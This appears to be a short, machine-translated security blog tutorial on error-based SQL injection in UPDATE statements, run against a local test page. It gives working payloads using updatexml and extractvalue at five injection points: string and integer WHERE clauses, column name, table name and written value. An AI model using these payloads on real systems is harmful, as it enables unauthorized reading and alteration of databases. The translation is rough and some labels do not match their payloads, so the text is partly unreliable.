Visit the home page of http://127.0.0.1/sql/update.php update module, began to update module test.
The update syntax:
UPDATE [users] SET [username] = 'haxotron9000' WHERE username = '1'Copy the code
The received parameters may be concatenated to any of the above statement [] positions, four positions, five different types. Let’s start the demo:
Syntax: String in WHERE clause
Construct the POC:
' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'
Copy the code
Get the database version as shown below
Integer in WHERE Clause
Construct the POC:
1 or extractvalue(1,concat(0x7e,database())) or''
Copy the code
Get the database version as shown below
Third, the Column Name
The injection point is at [1],
UPDATE users SET 【1】 = ‘haxotron9000’ WHERE isadmin = 0
There are two ways you can think of using it:
1, comment out the following statement, free construction error statement for execution
Alter user data in users table
POC:
UPDATE users SET id=1 or extractvalue(1,concat(0x7e,database()))
Copy the code
Four, the Table Name
The injection point is at [1]
UPDATE 【1】 SET username = ‘haxotron9000’ WHERE isadmin = 0
How can we use it?
1, the name of the table can be controlled by itself, in the case of a certain table a certain column, you can change the data freely.
2, construct error injection, similar to the previous one.
五, Value to write
The injection point is at [1]
UPDATE users SET username =【 ‘1’】 WHERE isadmin = 0
Construct the POC:
UPDATE users SET username = '1' or extractvalue(1,concat(0x7e,database()))#
Copy the code
There seems to be nothing new, just these methods are switching, and then think of other methods to update
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.